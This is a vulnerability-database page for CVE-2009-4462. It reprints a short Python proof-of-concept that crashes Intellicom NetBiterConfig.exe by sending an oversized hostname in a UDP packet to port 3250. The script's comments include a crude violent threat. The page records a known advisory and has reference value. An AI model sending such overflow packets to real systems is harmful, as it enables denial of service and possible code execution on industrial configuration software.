Intellicom 1.3 - 'NetBiterConfig.exe Hostname' Data Remote Stack Buffer Overflow (PoC)
| Reporter | Title | Published | Views | Family All 8 |
|---|---|---|---|---|
| CVE-2009-4462 | 14 Dec 200900:00 | – | circl | |
| CVE-2009-4462 | 30 Dec 200919:00 | – | cve | |
| CVE-2009-4462 | 30 Dec 200919:00 | – | cvelist | |
| HMS HICP Protocol + Intellicom - 'NetBiterConfig.exe' Remote Buffer Overflow | 14 Dec 200900:00 | – | exploitdb | |
| Netbiter Config NetbiterConfig.exe Device Hostname Remote Overflow | 30 Dec 200900:00 | – | nessus | |
| CVE-2009-4462 | 30 Dec 200920:00 | – | nvd | |
| Stack overflow | 30 Dec 200920:00 | – | prion | |
| IntelliCom NetBiter Config HICP hostname buffer overflow | 24 Mar 201000:00 | – | cert |
#!/usr/bin/python
#
#source: https://www.securityfocus.com/bid/37325/info
#
#Intellicom 'NetBiterConfig.exe' is prone to a remote stack-based buffer-overflow vulnerability because the application fails to perform adequate boundary checks on user-supplied data.
#
#Attackers can exploit this issue to execute arbitrary code within the context of the affected application. Failed exploit attempts will result in a denial-of-service condition.
#
# Intellicom NetBiterConfig.exe 1.3.0 Remote Stack Overwrite.
# Ruben Santamarta - www.reversemode.com
# For research purposes ONLY.
# If you use this code to cause damage I’ll cut you open like a f***ing pig.
import sys
import socket
s = socket.socket(socket.AF_INET,socket.SOCK_DGRAM)
s.connect(("10.10.10.10",3250))
s.send("protocol version = 1.10; "
+"fb type = EVIL-DEVICE; "
+"module version = 0.66.6; "
+"mac = 00-30-11-00-BA-CA; "
+"ip = 192.168.1.52; "
+"sn = 255.255.255.0; "
+"gw = 192.168.1.1; "
+"dhcp = off; "
+"pswd = off; "
+"hn = "+"A"*0×60+"; "
+"dns1 = 192.168.1.33;")Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
08 Jan 2018 00:00Current
5.8Medium risk
Vulners AI Score5.8
CVSS 210
EPSS0.1986